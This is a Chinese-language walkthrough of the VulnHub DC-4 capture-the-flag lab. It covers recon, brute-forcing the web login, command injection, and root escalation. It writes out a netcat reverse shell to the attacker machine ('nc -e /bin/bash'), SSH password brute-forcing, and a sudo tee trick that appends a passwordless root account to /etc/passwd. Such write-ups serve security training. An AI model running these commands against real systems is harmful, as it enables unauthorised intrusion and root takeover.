一、介绍

运行环境：Virtualbox

攻击机：kali（10.0.2.15）

靶机：DC4（10.0.2.57）

目标：获取靶机root权限和flag

靶机下载地址：https://www.vulnhub.com/entry/dc-4,313/

二、信息收集

使用nmap主机发现靶机ip：10.0.2.57

使用nmap端口扫描发现靶机开放端口：22、80

打开网站是一个登录页面，查看源码也没有发现隐藏信息

使用gobuster和dirsearch工具进行目录爆破，未发现什么有用的目录和文件

gobuster dir -u http://10.0.2.57/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

dirsearch -u http://10.0.2.57

三、漏洞利用

登录界面可以使用sqlmap跑一下看看有没有sql注入，但发现没有

只能进行暴力破解看看了，使用用户名admin，爆破密码

爆破得到密码：happy，登录网站

把网站各个功能点点击一下，发现命令执行ls -l

抓包修改命令为id，执行命令成功

使用nc反弹shell

which+nc   #查看是否存在nc
nc+-e+/bin/bash+10.0.2.15+4444

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

四、提权

翻一翻靶机各个文件夹，在/home/jim/backups文件夹下发现old-passwords.bak文件，该文件是一个字典文件

使用该字典对jim用户的ssh进行暴力破解，得到密码：jibril04

使用ssh登录jim用户

运行命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件，发现/home/jim/test.sh文件

查看该脚本的内容，利用不了

在/var/www/html目录下还发现了jim的邮件信息，里面存在charles用户的密码：^xHhA&hvim0y

切换为charles用户，使用命令sudo -l查看该用户的sudo命令，发现可以无密码执行/usr/bin/teehee命令

查看teehee命令帮助信息

teehee --help

搜索利用方法：tee | GTFOBins

LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"

我们可以用teehee命令写一些信息到/etc/passwd文件里面，进行提权

echo "myroot::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

获取flag

参考链接：DC-4靶场实战详解-CSDN博客